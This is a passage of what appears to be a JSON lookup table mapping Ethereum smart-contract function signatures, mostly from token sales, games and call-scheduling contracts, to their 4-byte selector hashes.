"increaseWithdrawalChunk()": "0xd36bf8a1", "getWeiRaised()": "0x40582f13", "withdrawTeamFunds()": "0x9ee04661", "setCrowdsaleFinished()": "0x66cd0663", "setTokenContract(address,address)": "0xa4a94567", "setVotingProxy(address)": "0x6c4d4f21", "Treasury(address)": "0xfb26c00f", "RefundInvestorsBallot(address)": "0xf4d0b2a5", "blacklistInvestor(address)": "0xffc1b038", "whitelistInvestors(address[])": "0x5613680a", "whitelistInvestor(address)": "0xc430bcda", "mintTeamTokens()": "0xe5ff2e8a", "getStateForTime(uint256)": "0xcfd9e0ea", "getWeiAllowedFromAddress(address)": "0x7a20ff15", "isReadyToFinalize()": "0xdeed18e2", "getTokenAmountForEther(uint256)": "0x5bcc209d", "getTokenRateEther()": "0xd4d42658", "convertUsdToEther(uint256)": "0xd06426d5", "finalizeByAdmin()": "0x221353ca", "buyForWhitelisted()": "0xfd50b005", "EthearnalRepTokenCrowdsale(address[],address,address)": "0xed98f12c", "setupOwners(address[])": "0x2433c978", "decide()": "0x305fcef3", "processVote(bool)": "0xcd78a3b7", "isDataNo(bytes)": "0x6594d99b", "isDataYes(bytes)": "0x5f43e49c", "getQuorumPercent()": "0xc93685b8", "Ballot(address)": "0x3ada121c", "LBCToken(address,address)": "0xcd6e4dad", "Smilebitbuy(uint256,string,uint8,string)": "0x9d6dcf53", "XID(address)": "0xf12611f1", "startUnlimitedSale(uint256)": "0xf7627da2", "PretherICO()": "0x461a2df9", "TokenWithMint(string,string,uint8,uint256)": "0x80fa272f", "TecToken(string,string,uint8,uint256)": "0x4abe34f2", "setBonus(uint8)": "0xe6ed4746", "GMBCToken()": "0x8926f723", "setMinPurchase(uint256)": "0xe8307d00", "setPayableEnabled(bool)": "0xa2ea80f9", "CappedMintableToken(uint256)": "0x18300c1a", "substituteManagerContract(address)": "0x83664dd3", "sendTokensTo(address[],uint256)": "0x9360b138", "setEmissionTime(uint256)": "0xd0286ab2", "distributeTokens(address,address,uint256)": "0x70862562", "_distributeRegistrationBonus(address)": "0x5571954d", "distributeRegistrationBonus(address)": "0x746abc79", "QYCC()": "0x7f390088", "IGTRMB()": "0x7c06eb7c", "DIUToken()": "0x1d2eda60", "lockTokenDays(address,uint256,uint256)": "0xd95405f2", "lockTokenToDate(address,uint256,uint256)": "0xd472fa26", "UUSD()": "0x05f671d9", "Kether()": "0x00903c69", "MTRCToken(address,string,string,uint256,uint256)": "0x6c8b37eb", "TriumHolding()": "0xbea433a9", "MXN_Omnidollar()": "0xda4a22dc", "kycAddress()": "0x49b85a16", "recoveryModeTriggerTime()": "0x0f42fdfb", "emergencyFundReleased()": "0xbe53874f", "APP_MANAGER_ROLE()": "0x8ea8dc9d", "startWithdraw()": "0x90ed6bf4", "rawTokenSupply()": "0x2cae9add", "getGamePaused()": "0xefcceaae", "blockCrowdsale()": "0xa8cbabb7", "updateUSeqgret()": "0x8f62b028", "DATE_LIMIT()": "0x068ae02b", "isDayThird()": "0xe92f7447", "statusDoacao()": "0x96b116c6", "rateThirdRound()": "0xb875a5e0", "BLU()": "0xf470fd5e", "fifthWeekTokenPrice()": "0xabfebfd9", "LOOMIA2()": "0x976bd47d", "tokensReleasedAmount()": "0x6686e174", "_targetBlock()": "0xc64a2358", "getAssetBaseInfo()": "0x50e26c23", "protocolVersion()": "0x2ae9c600", "STARTING_STRIPPERS()": "0x9c3807e6", "bonusDeliverTime()": "0x0ac2a1c7", "latestBidTime()": "0xe56988dd", "team_token_percentage_total()": "0xac6eead3", "current_tier()": "0xe27da9c6", "rateThirdWeek()": "0xb2394040", "tokenMetadataBaseURI()": "0xb5cab1ce", "tokenOWL()": "0x3540e96c", "tokensale()": "0x704248ec", "fifth()": "0xf9782191", "STARTING_SQUIRREL()": "0x3ab4c395", "DISCOUNT_STAGE_THREE()": "0x9abec159", "ratePerWei()": "0xbc7c322c", "initialSupplyPerAddress()": "0x0ccde0b1", "countWishes()": "0x4e82844d", "processedTokens()": "0x8e8df687", "payoutDonations()": "0x9dae2e80", "specUWallet()": "0x6a7254a3", "DIVIDER()": "0x62043bd8", "maxThreshold()": "0x2e9501d6", "isAuctionManager()": "0x09c38bc8", "FOUNDERS_LOCK_START_TIME()": "0x17aad447", "rndExtra_()": "0x0cfa1d12", "miningIncentiveWallet()": "0x2ff59ee7", "poster()": "0x80959721", "silo_addr()": "0x13bd05e4", "TOKEN_SECOND_EXCHANGE_RATE()": "0x01e8b608", "ownersBalance()": "0x750482ba", "euroRaisedRc()": "0xf073b277", "phase_5_rate()": "0xa051b6b1", "JOY()": "0x7cac4c7d", "exchangeRateRoundTwo()": "0x9a325e52", "dividendsSum()": "0x9dd74964", "getFarm()": "0x4daf490c", "offerAsSacrifice()": "0x5d69f16f", "PrivateSaleFinished()": "0x399e3ca8", "companiesManager()": "0x98d15134", "MAIN_SALE_START_TIME()": "0x944ac0c6", "maxDailyCap()": "0xe94e4bf1", "PRE_ICO_BONUS_TIME_1()": "0x545e6362", "authorityContractAddress()": "0xf85daa38", "TOKEN_SALE_ALLOWANCE()": "0x9e0a2280", "rate10()": "0x79630bd8", "getTotalBuyers()": "0xe97b7689", "withdrawDeadBids()": "0xddb22537", "dmlToken()": "0x7591dfa0", "presaleBonusTier3()": "0x289fd839", "maximumPurchase()": "0x31a9b2f2", "oneEDG()": "0x7ab4e968", "divCutAdmin()": "0x349ab992", "nextBackWindowAdjustmentRatio()": "0xc8d50d7c", "mainSaleMinimumWei()": "0x7267a25b", "privatesaleTokens()": "0x5ab3ae21", "softCapToken()": "0x2ecf66e4", "starteth()": "0xc78f3e18", "executeTransaction()": "0x0eb288f1", "total_ICO_supply()": "0xbb5c3821", "burntFounder()": "0x693e2279", "periodPreITO_hardCapInWei()": "0xae0be41c", "developmentPercent()": "0x5ff1569e", "bountyManagerAddress()": "0x89225c5a", "neumarkCap()": "0x8648c0ce", "marketplaceAddress()": "0xdaa17f49", "ALC_DECIMALSFACTOR()": "0x4a39a5f4", "FROZEN_TOKENS()": "0x0f6521e2", "withdrawHouseEarnings()": "0x41883b78", "minReward()": "0xba16d600", "GasSell()": "0x1335b56b", "ENTERED_MASK()": "0x18797499", "greenToken()": "0x02b32af5", "burned()": "0x73f42561", "RESERVED_TOKENS_FUTURE_OPERATIONS()": "0x64f40a3c", "largestHODLERBalance()": "0x46e5c323", "tokensInPlay()": "0xafa9a86e", "MINI_GAME_TIME_DEFAULT()": "0x187fd079", "edrBalance()": "0x8b038f7f", "addressOfTokenUsedAsReward()": "0x88adbf8f", "loanDuration()": "0xf5521bf1", "publicSaleSoldTokens()": "0x1bda6d55", "STATUS_DEAL_WAIT_CONFIRMATION()": "0xf2dfa136", "removeIdArrayItem(address,uint256[],string,address)": "0x5cd03a3f", "removeIdArrayItem(address,uint256[],string,uint256)": "0x82bbcc2c", "getRemovableIdArrayAddressItems(address,uint256,string,string,string)": "0x868defd0", "getRemovableIdArrayItems(address,uint256,string,string,string)": "0x68d64514", "addRemovableIdArrayItem(address,uint256[],string,string,string,address)": "0x2704e8e9", "addRemovableIdArrayItem(address,uint256[],string,string,string,uint256)": "0x944dc22c", "getAddressIdArray(address,uint256,string,string)": "0x7c6fe7a9", "setIdArray(address,uint256,string,string,address[])": "0xdd76d2fa", "getIdArray(address,address,string,string)": "0xdd18b250", "getIdArray(address,uint256,string,string)": "0xc0f6c7b8", "setIdArray(address,address,string,string,uint256[])": "0x73963bf0", "setIdArray(address,uint256,string,string,uint256[])": "0xa9b07600", "addIdArrayItem(address,address,string,string,uint256)": "0x14b577ab", "addIdArrayItem(address,uint256,string,string,address)": "0x09b7c704", "addIdArrayItem(address,uint256,string,string,uint256)": "0xc784648d", "getIdArrayItemsCount(address,address,string)": "0x65f926ff", "getIdArrayItemsCount(address,uint256,string)": "0xa5857318", "getAddressArray(address,string,string)": "0xe45d0550", "containsValue(address,uint256,string,uint8[])": "0x6b32bb25", "createNext(address,string)": "0xf33376c6", "getCount(address,string)": "0x241d2c76", "create(address[],uint256[],uint256[],address,address,bytes)": "0x0f8c04e2", "getIssuable()": "0x375dce69", "buyLicense(address,address,string)": "0xa2aca613", "stopIssuing()": "0x44d7e4ed", "checkLicense(address,address)": "0x5607f324", "checkLicense(bytes32,uint8,bytes32,bytes32)": "0x7216b95c", "LicenseIssuer(string,string,string,uint256,uint256,address)": "0x1c05123d", "changePaymentAddress(address,uint256)": "0x5e601fed", "stopIssuing(uint256)": "0x40426fb0", "createIssuerContract(string,string,string,uint256,uint256)": "0x67eb9bab", "changePaymentAddress(address)": "0x7124d613", "LicenseManager(address,string)": "0x38ceaf1b", "sortTrusted()": "0xefabaa89", "getRandomArbiter()": "0xc955457e", "getArbiter(address)": "0x5b767e86", "payFunction()": "0x95bc7eec", "performWithdrawAccounting(uint256,address)": "0xfe1c91fa", "secureWithdraw(uint256,address)": "0xa9cd9e06", "wrap()": "0xd46eb119", "getNonceCompareOp()": "0xbb8dc735", "Get()": "0xb1976a02", "Set(bytes32)": "0x7d4c258a", "RepublicKey(address[])": "0x53497794", "getRetailer(uint256)": "0x89d86c5d", "getRequestStatus(address,address)": "0xd0ae4356", "getTotalBonus()": "0x4ac5aae5", "getBonusRate()": "0xf794eb58", "MultiBonusCrowdsale()": "0x4ae86038", "Poll()": "0x36274669", "EventStore()": "0xe10c7bb5", "newBooleanValue()": "0xf278bd02", "Gateway()": "0x46e9ab22", "getRegisteredModuleAt(uint256)": "0x62f6cf7f", "numRegisteredModules()": "0xe26bc039", "updateDescriptiveInformation(address,string,string,string,string,bytes20)": "0x23e3d7a9", "ModuleRegistrar(address)": "0xb151c0c8", "SGTExchanger(address,address,address)": "0xbdc06de4", "ico()": "0x5d452201", "calculator(address,uint256,uint256)": "0x0d8c3c2f", "lockBalance(uint256,bool)": "0xd10a5e1d", "getPartner(uint256)": "0x7fc96619", "getOffer(address,uint256)": "0xac71045e", "createOffer(address,uint256,uint256,bool,uint256)": "0x554d27ca", "Simple_Claimable_Temporized_Stake()": "0x00f43f6d", "manager(uint256,address,string,uint256,bool)": "0x9237e074", "setSelfPretorian(address,address,address)": "0x58e77a92", "Flood_Standard_Ethereum_Coin(uint256,string,string,uint256)": "0x1046e2ab", "testRegisterNickWalletEth()": "0xd2f7f377", "testRegisterSwarmEth()": "0xbed0a8e5", "initEnsRigistrar()": "0xbc0111a8", "testEnsFail()": "0xed148ea7", "testEns()": "0x1ac14219", "myFirstLoop()": "0xc9a8baae", "numberLoop()": "0x95206396", "divideByNumber(uint256)": "0xf5cb911d", "multiplyWithNumber(uint256)": "0xb4679b06", "substractNumber(uint256)": "0x0b7e4e7f", "addToNumber(uint256)": "0x06ccd230", "setExchangeRateByOraclize(address,bytes32,string)": "0xaf4bed26", "payday(uint256,address,uint256)": "0xef940837", "emergencyWithdraw(address)": "0x6ff1c9bc", "setEscapeHatch(address)": "0x48b5de18", "setTokens(address,address)": "0xcbc7854e", "setDB(address)": "0x65401882", "PaymentServ(address,address,address,address)": "0x2b69f40d", "getApp(bytes32)": "0x42c71f1d", "setApp(bytes32,bytes32,address)": "0xae5b2540", "acl()": "0xde287359", "setUpgradeHasBegun()": "0xa463a500", "setNewToken(address)": "0x5ed411e5", "safetyInvariantCheck(uint256)": "0xb650bbef", "UpgradeAgent(address)": "0x90a650e8", "createToken(address,uint256)": "0x6a10d4d6", "NewToken(address)": "0x0f53e2a8", "FixedCapSampleCoin()": "0x1283c377", "createQuote(uint256,uint256,bytes32)": "0x94759c36", "getQuote(address,uint64)": "0x627e64d2", "getUserQuoteIds(address)": "0xa83e1d10", "getOracleDetails()": "0x41bc7b1f", "Compound_now_Accrued_interest()": "0x0dafc58f", "saasApiProfitAddress()": "0x98e364d6", "ownerCutPercentage()": "0x8174b6d7", "resAmount()": "0xfc15dcef", "allowTransactions()": "0xa5488a37", "allocateEndBlock()": "0x69833668", "jak()": "0xd06d4612", "publicResolver()": "0xf8256121", "firstPresaleEnd()": "0xa2b424b1", "ownerTokenSharePct()": "0xa8f03616", "baseowner()": "0xde3bec59", "timeStarted()": "0x638f6575", "preICOgoal()": "0xb00cdd9b", "ETH_PRICE()": "0x8832bc29", "POT_DRAIN_TIME()": "0xb697fc93", "DOW_MON()": "0xf9fd5250", "jackpotCount()": "0xbaa30f7b", "totalAmountOfWeiCollected()": "0x6be2f28e", "endSecondBonus()": "0x21b288d8", "GetMinimumBet_ether()": "0x4e76f5d2", "bankValReserve()": "0x3f94904a", "tokenLossRatio()": "0x963d62fb", "auctioneer()": "0x5ec2c7bf", "preCrowdMinContribution()": "0xbf1e8497", "getPayer()": "0x30aa81c6", "setKYCAddress()": "0x77b74692", "addressCommunity()": "0x33f4406a", "getPoolSize()": "0x23845e4b", "winnerAddress()": "0xed7a4e0b", "total_tickets()": "0xc42cce7e", "gasEpoch()": "0x284fd42f", "confirmer()": "0x6fc3c817", "total_received_amount()": "0xbc60878e", "challengeFee()": "0x1bd8f9ca", "TeamLockingPeriod24Months()": "0x57cd23a6", "proposedOwner()": "0xd153b60c", "addressETHDeposit()": "0x9c255312", "issuable()": "0xeba0184f", "transactionCounter()": "0x14e887e8", "tgrSettingsMaxStages()": "0x5b7b716c", "just10Send()": "0x148fa780", "PURCHASER_MAX_TOKEN_CAP()": "0xd1ff535e", "PUBLIC_SALES_1_RATE()": "0x8db1ccac", "authorisedContract()": "0x91ab0ca0", "COMPANY_ALLOCATION()": "0x7064f0af", "battleboardDataContract()": "0x36470665", "ClaimAmount()": "0x1a0d77b9", "treasurySent()": "0x23ed476f", "CYCLE_CAP()": "0xfca69afa", "ICO_BONUS()": "0xb127221d", "bonusLevel0()": "0x280e0359", "delayOfICO1()": "0xf6adab61", "priceTokenWeiPreICO()": "0xeaac77a7", "oracleAddress()": "0xa89ae4ba", "claimRate()": "0x898fdf94", "Rate6()": "0x3af8470d", "atxRate()": "0x78108368", "tokenExchangeRateMile1()": "0x34428440", "finalised()": "0x214bb60f", "airDropsClaimed()": "0x9fe72acd", "totalRewardsRedeemed()": "0x95a1297a", "initialSupplyPreSale()": "0x14f8917a", "TIER2_CAP()": "0xc7f43b57", "companyTokensInitial()": "0x97d6ce76", "neededAmountTotal()": "0xce510d46", "COMMUNITY_SUPPLY()": "0x73a4c307", "countPlayer()": "0xaaa006b2", "getCurrentMode()": "0x15370598", "nAuditorsRequired()": "0x4812663f", "operatingAddress()": "0x80ac5448", "fibokenUsedCount()": "0xa1ba7554", "acceptingDeposits()": "0xdf334093", "angelFoundationShareNumerator()": "0x1180d67e", "MIN_BET_VALUE()": "0x5394772a", "periodITO_endTime()": "0xf3df29b6", "lastTokensIssued()": "0xecb828ea", "get_len()": "0x9ac58d58", "founder1()": "0x116b556b", "mandateInBlocks()": "0x3af5dbb6", "MCTTokenAddress()": "0x3dba0b57", "advisoryVUPDestination()": "0x130c0e88", "dutchAuctionToBuy()": "0x52736814", "multiSigOutputAddress()": "0x9880472f", "payoutsWallet()": "0xd3eb11d6", "isConsumable()": "0x86bc2338", "ambassadorAddress()": "0xc7c806cb", "AfterSaleTransferableTime()": "0x6a369137", "fundingEthGoal()": "0xcc7cd9f8", "infoICO()": "0x44d02c2a", "finalAddress()": "0x3c745371", "paused_1()": "0xa92aafb0", "TOKEN_RATE_15_PERCENT_BONUS()": "0x75cf567a", "postico_startdate()": "0x9329f2fe", "unlockDate5()": "0x0f76b651", "databaseAddress()": "0xdfa15809", "proceedsAddress()": "0x3209943e", "proposalAuthor()": "0x8485b90c", "maxPreIcoAmount()": "0x158e7e53", "shareCycleSessionSize()": "0x2ce52d9b", "advisor2Sum()": "0x285e8516", "presaleAllocateTokens()": "0x73cce6f1", "defaultClaimPercentage()": "0x049e63ee", "decimalOfPrice()": "0x10dc0e3c", "lastBlock_f17()": "0xbd7afb29", "fifthMonthEnd()": "0x9f16d65f", "ptc_addr()": "0xa57918dc", "koCommissionAccount()": "0x6e93dbdc", "double()": "0x8fdb7189", "preSaleTokenBalances()": "0x3ba308dd", "DEADLINE()": "0xa082c86e", "reservedFundLeft()": "0x7e24cb8f", "docCount()": "0x4c4dc6e0", "endPublicSaleStage()": "0x447e6967", "firstRoundICOTokensLimit()": "0x899d1556", "totalMintLimit()": "0x76dd1f86", "TOTAL_SATOSHI()": "0xa062d5fe", "softcapMainSale()": "0x9fb03244", "addTokenPendingToken()": "0xdce1d3c6", "trustedWallet()": "0x570d2f8f", "roundReward()": "0xf199f56d", "PRICE_MULTIPLIER_ICO3()": "0x434fb2ae", "refundingIndex()": "0x39612b0e", "TEAM_TOKENS_LOCK_PERIOD()": "0xddb31cea", "AddDiv()": "0xcb161f8a", "lastUpdateOverall()": "0x31b4784e", "webGiftSentAmount()": "0x3bc19bba", "tokenSender()": "0x9898e18c", "DELETE_NAME_ROLE()": "0xbdbf7d4c", "dinoToken()": "0xf69adce6", "underlying()": "0x6f307dc3", "salePriceWei()": "0x976e14d6", "purchaseRound()": "0x27ffb7b0", "geneKind()": "0xc5f0d3d6", "sumICOStage2()": "0x6a23b9df", "buySmartContract()": "0xa72ff7de", "totalRaisedInWei()": "0xebcbee16", "User_2()": "0x882b4e68", "iiinoTokenAddress()": "0xe5af8d92", "winning_bets_total()": "0xdd0fa641", "market2021TokenCreated()": "0x256c10a1", "totalWeiContributed()": "0xa5aeb9b7", "econReserveWallet()": "0x85b443b6", "tokenRaised()": "0x26a21575", "FUTX()": "0xd9dbd382", "pendingParsecs()": "0x5fc6bd17", "TOTAL_ARK()": "0x4e18405d", "saleEndBlock()": "0x3f99a12b", "PolyCustomers()": "0xa5d5ca54", "lockInTreasury()": "0xd1c1132f", "lastBlock_v3Hash_uint256()": "0x93d1217e", "_nextOwner()": "0x97f59897", "tacoPoolTotal()": "0xf5e736ed", "rate_BTCUSD()": "0x3a4e3342", "withdrawalLockTime()": "0x34f732e8", "operationsTokens()": "0x7bf0a8f3", "getCurrentSaleRate()": "0x6bb15940", "tableSize()": "0xd4030114", "endCrowdsalePhase2Date()": "0xf20d5385", "CHINESE_EXCHANGE_4()": "0xdf1673e9", "lockingRatio()": "0xb152fbd1", "ethpyramid()": "0x103cbb7f", "MAXIMUM_SUPPLY()": "0x3d0c4924", "finalize1()": "0x36c35f94", "LAND_ADDRESS()": "0x78e7e5ea", "goldBoxPrice()": "0x66b464de", "precisionMinimum()": "0xd131af30", "getWinnerPot()": "0xa0b43a4e", "extended()": "0x6f3921ee", "priceDecreaseRate()": "0xeecb24ec", "developReserveTimeLock()": "0xa39a70a9", "paymentDestination()": "0x5768fca3", "totalSeraphims()": "0xbbc878c4", "MAX_OBR_CAP()": "0x287b895c", "soldTokensTotal()": "0xb40615c6", "donationsReceiver_()": "0x51fbd91e", "BOUNTY_EXCHANGE_RATE()": "0x08f6e3b4", "priceT3()": "0xfbd7c5f1", "chunk4IsAdded()": "0x36371722", "MINT_AMOUNT()": "0x5427789c", "earlybird()": "0x67863c07", "promoToken()": "0x4da0a4fc", "first_partner_address()": "0x920dd47b", "bid_threshold()": "0x2a887299", "agTechWallet()": "0xf6fcc14e", "paydayFrequencyInDays()": "0x02474718", "vestingPercent()": "0x3aeb6c71", "puppySports()": "0x08595e5e", "basicReward()": "0x1f98394d", "PRE_SALE_GMR_TOKEN_CAP()": "0x731fb32e", "MAX_BOUNTYTOKENS_AMOUNT()": "0x2b788e33", "totalIssueTokenGenerated()": "0x906686a6", "totalEthxCollected()": "0x3911e1e1", "rate5()": "0x17ccf6a0", "tokenTotalSold()": "0x6eb769d2", "totalNoOfTokenAlocated()": "0x077135a8", "minTokenPurchase()": "0x3fadbd3e", "MIN_CONTRIBUTION_PRESALE()": "0xdbaaa2dd", "tokensToPartner()": "0x3186f390", "allowsNewGames()": "0xef449888", "BANKROLLER()": "0xaefbbf2a", "scheduleCall(address,bytes,bytes,uint8,uint256[4])": "0xd6eafd08", "afterExecute(address)": "0x09b30ed5", "scheduleCall(bytes,bytes,uint256,uint256,uint8,uint256)": "0xe7329e71", "beforeExecute(address,uint256)": "0x7d298ee3", "scheduleCall(address,uint256,bytes,uint256,uint256,uint8,uint256)": "0x40953102", "state()": "0xc19d93fb", "scheduleCall(bytes,uint256,uint256,uint8,uint256)": "0xc6236a5c", "FutureCall(address,uint256,uint16,address,bytes,bytes,uint256,uint256,uint256)": "0x4571d4c4", "scheduleCall(address,bytes,bytes,uint256,uint256,uint8)": "0x67a59d91", "firstClaimBlock()": "0x0fd1f94e", "scheduleCall(address,uint256,bytes,uint256,uint256,uint8)": "0xaa497b9d", "maxClaimBlock()": "0xcc3471af", "scheduleCall(bytes,uint256,uint256,uint8)": "0x0e554bd8", "lastClaimBlock()": "0xa9d2293d", "scheduleCall(address,bytes,bytes,uint256,uint256)": "0x64bd87d6", "getClaimAmountForBlock(uint256)": "0xf5562753", "scheduleCall(bytes,bytes,uint256,uint256)": "0x49942ccb", "getGasScalar(uint256,uint256)": "0xb5d0f16e", "scheduleCall(address,bytes,uint256,bytes,uint256)": "0x76ca0c77", "sendSafe(address,uint256)": "0xc17e6817", "scheduleCall(address,bytes,bytes,uint256)": "0xa0bd3c0f", "checkDepth(uint256)": "0x349501b7", "scheduleCall(bytes,bytes,uint256)": "0x75f45878", "scheduleCall(address,uint256,uint256)": "0xd8e5c048", "scheduleCall(address,uint256)": "0xb5b33eda", "scheduleCall(uint256,address)": "0xa00aede9", "scheduleCall(address,bytes,uint256,bytes)": "0x3fbb539d", "scheduleCall(address,bytes,bytes)": "0xa6cb9e64", "scheduleCall(address,uint256,bytes)": "0x4b63e601", "scheduleCall(address,bytes)": "0xa045fdff", "scheduleCall(address)": "0x04509918", "scheduleCall(bytes,bytes)": "0xf4bbfd6a", "scheduleCall(bytes)": "0x67beaccb", "scheduleCall(uint256)": "0x112e39a8", "scheduleCall()": "0xc3a2c0c3", "getDefaultRequiredGas()": "0xdbfef710", "getDefaultStackCheck()": "0x1b4fa6ab", "getMinimumEndowment(uint256,uint256,uint256)": "0x7c73f846", "getMinimumEndowment(uint256,uint256)": "0xf158458c", "getMinimumEndowment(uint256)": "0xaff21c65", "getMinimumEndowment()": "0x1e74a2d3", "getDefaultDonation()": "0xbbc6eb1f", "updateDefaultPayment()": "0xe6470fbe", "callAPIVersion()": "0x3017fe24", "Scheduler()": "0x45fe6e2a", "_compare(int256,bytes,int256)": "0xc5699d68", "max(uint256,uint256)": "0x6d5433e6", "sendRobust(address,uint256,uint256)": "0xc6ab4514", "sendRobust(address,uint256)": "0x12c82bcc", "InsufficientFunds(address,uint256,uint256)": "0x5c54305e", "Withdrawal(address,uint256)": "0x7fcf532c", "Deposit(address,address,uint256)": "0x5548c837", "getMinimumEndowment(uint256,uint256,uint256,uint256)": "0xea27a881", "getFirstSchedulableBlock()": "0xb152f19e", "getMinimumCallCost(uint256,uint256)": "0x96cff3df", "getMaximumCallGas()": "0x26a7985a", "getMinimumCallGas()": "0x98c9cdf4", "getDefaultGracePeriod()": "0x8e46afa9", "getMinimumGracePeriod()": "0xc0f68859", "getCallWindowSize()": "0x98e00e54", "getMaximumStackCheck()": "0x586a69fa", "getMinimumStackCheck()": "0x971c803f", "doStackExtension(uint256)": "0x2e9c5e77", "__dig(uint256)": "0x21835af6", "proxyCall(uint256)": "0xac1b14ff", "setCallAddress(address)": "0x9941e3d0", "doInfinite()": "0x3809c0bf", "doFail()": "0xf46c50dc", "setMany(uint256,int256,uint256,bytes,address,bytes)": "0x999a9965", "setCallData()": "0xbadbaa3c", "setBytes(bytes)": "0xda359dc8", "setBytes32(bytes)": "0x46d667db", "setAddress(address)": "0xe30081a0", "setInt(int256)": "0x747586b8", "setUInt(uint256)": "0x9378a9e2", "version()": "0x54fd4d50", "scheduleSetUInt(address,uint256,uint256)": "0xa71f94c8", "setBool()": "0x6f374a12", "scheduleSetBool(address,uint256,bool)": "0x6558488a", "doLoops(uint256)": "0x1db71ffb", "doExecution(address)": "0x5629c6d9", "noop()": "0x5dfc2e4a", "registerData(address,int256,bytes,address)": "0x5bfdc700", "registerMany(address,uint256,int256,uint256,bytes,address,bytes)": "0x9c1500f0", "registerAddress(address,address)": "0x31b0795c", "registerBytes(address,bytes)": "0x5dcbac7a", "registerBytes32(address,bytes)": "0x9aa26f06", "registerInt(address,int256)": "0x1fb291cb", "registerUInt(address,uint256)": "0x9872a20a", "registerBool(address,bool)": "0x638560cf", "reset()": "0xd826f88f", "scheduleCall(address,bytes,uint256,uint256,uint8,uint256,uint256)": "0xf37b437b", "scheduleCall(address,bytes,uint256,uint256,uint8,uint256)": "0xb7aec6a5", "scheduleCall(address,bytes,uint256,uint256,uint8)": "0x6b069710", "scheduleCall(address,bytes,uint256,uint256)": "0x075fe877", "scheduleCall(address,bytes,uint256)": "0x1e39499d", "scheduleTransfer(address,uint256,uint256)": "0x7f497550", "scheduleCall(bytes,uint256)": "0xdd2ad311", "releaseFunds()": "0x69d89575", "TrustFund(address,uint256,address)": "0xdfcbb794", "proxyPayments(address)": "0x6f2fc06b", "KRTR()": "0x7b0934ab", "BlockFilesManagement()": "0xc3a0ba73", "EtherOcrend()": "0xfc7d2b3a", "claimPayment(uint256,uint256,bytes)": "0xa90ae887", "ReceiverPays()": "0xa70b21a3", "Block18Token()": "0x0b8762d1", "getButtonPrice()": "0x884ca7b1", "GetCurrentNumbers()": "0xda2a97d8", "GetMainInvestor()": "0x6ce768dd", "GetPlayerDetails(address,address)": "0x0b294bdf", "GetPlayer(uint256)": "0x5d200f84", "FundContract()": "0x8ed8067e", "GodviewChain(uint256,string,uint8,string)": "0x4bdbb944", "IFNToken(address,address,uint256,string,uint8,string)": "0x6564ad28", "VIRTToken()": "0x899b6713", "recycling(address,uint256)": "0x33677c30", "ETUToken(string,string,uint256,uint256)": "0xe39608af", "QDCoin()": "0xcfd6eea2", "_generateLog(uint32,uint8,uint32,uint8,uint8,uint8)": "0x2cf75c11", "getTrapid(uint256,uint8)": "0xf80eba7c", "getWidth(uint256)": "0x9419fd29", "getTrapInfo(uint256)": "0x8f50fb06", "getLogs(uint256)": "0x1124c05a", "getOpen(uint256)": "0x75321c4a", "setItemPerPage(uint16)": "0xe59de295", "lost(uint256,uint256)": "0xc9dfa731", "win(uint256,uint256,uint256,bytes,uint256)": "0xce8775a4", "resetTraps(uint256)": "0x2671e253", "setTraps(uint256,uint16,bytes)": "0x4c207ac8", "setfreeze(bool)": "0xb15897cc", "cdc()": "0x828ae96d", "log(uint32,address,address,uint256,uint256,uint256)": "0x3316d122", "getLockInfo(address)": "0x7238ccdb", "grant(address,uint256,uint256,uint256)": "0xcb740c61", "KRHCoin(uint256,string,uint8,string)": "0x41ebb063", "convertToMiniCFT(uint256)": "0x57aeb5c8", "IRtokenChain(uint256,string,string)": "0x4e8b75d0", "SuperPAC()": "0x82f8767d", "executeFill(address,address[5],uint256[8],uint256,uint8,bytes32,bytes32)": "0xf5e82554", "SCTC(uint256,string,string)": "0x5f28213b", "BieberToken()": "0xa4db8c73", "createTokenUri(uint8,uint8,uint8,uint8)": "0xb1110c29", "TOZToken()": "0x1b0710b5", "ITube()": "0xbd59fdde", "BitcoinPro()": "0x37ed89b2", "setTokenInformation(string,string,uint256)": "0x26c9bc42", "YouGive(uint256,uint256,string,string,address,address)": "0x708c2956", "BitCronus()": "0x247b3bd6", "getBonusValue()": "0xbcc221d0", "admin_renewLockedAddress(address,address,uint256)": "0x047febbe", "admin_tokenAdd(uint256)": "0xe6c4c2c7", "admin_tokenBurn(uint256)": "0x20d76113", "admin_transferFrom(address,address,uint256)": "0xd05391d2", "admin_transfer_tempLockAddress(address,uint256,uint256)": "0x6e32cf8e", "get_tokenReward()": "0x2351c2f8", "get_depositLock()": "0x0d015e4b", "get_transferLock()": "0x5eeb9ff9", "get_tokenTime()": "0x5debc7af", "delete_blockedAddress(address,address)": "0x7cae8509", "delete_allowedAddress(address,address)": "0xc72c757e", "add_blockedAddress(address,address)": "0x14a47046", "add_allowedAddress(address,address)": "0xe124e37b", "setTimeStampStatus(uint256,uint256,string)": "0x0f14b900", "setDepositLock(bool)": "0xfe4170bc", "setTimeStamp(uint256,uint256)": "0xddb6af4c", "setTokenReward(uint256)": "0x4fe01d38", "setStatus(string)": "0x7d2211d6", "_createRareCard(address,uint256,uint256,uint256,uint256)": "0xe27008c2", "createRareCard(uint256,uint256,uint256)": "0xe422d6b8", "RareCards()": "0x5556f3f6", "Bugcoin()": "0xe642b900", "controllerApproval(address,uint256)": "0xdc3a8372", "getFundReceiver()": "0xdf25322d", "getApprovalCount()": "0x0343d550", "setMinApprovalCount(uint256)": "0xc46a2925", "setApprovalCount(uint256)": "0x9c54b91f", "replaceController(address)": "0x632fbda4", "Press(uint256,uint256)": "0x3b9c67e1", "go()": "0x0f59f83a", "setlock(bool)": "0xa35da419", "EUSD()": "0xea58c644", "YOUQIANBI(uint256,string,string)": "0x2831ed5a", "appendUint8ToString(string,uint8)": "0x0a48dcb3", "createTokenUri(uint8,uint8,uint8,uint8,uint8)": "0xd20d6119", "insecureMode()": "0x9db91e78", "secureMode()": "0x0405440c", "WSXToken()": "0x5a500066", "dripMe()": "0x96e8cace", "setTokenUriPrefix(string)": "0x532e4849", "forceTransfer(address,address,uint256)": "0x33bebb77", "setGenome(uint256,uint256)": "0xf21f80d0", "setHeroData(uint256,uint16,uint16,uint32,uint32,uint32,uint64,uint64)": "0x6a1af8b8", "setLastTokenId(uint256)": "0xe81f35fd", "setUniquenessIndex(uint32)": "0xa4482f41", "incrementLastTokenId()": "0xb65c2b40", "incrementUniquenessIndex()": "0x14572dff", "activeHeroGenome(address)": "0x0b3464c3", "setActiveHero(uint256)": "0x1d6c0dfa", "_appendUintToString(string,uint256)": "0x8cc04ebb", "makeHash()": "0x82f0d875", "calcNextDrawTime()": "0x350fbe2e", "createNewDraw()": "0xfea2920e", "GetPrize()": 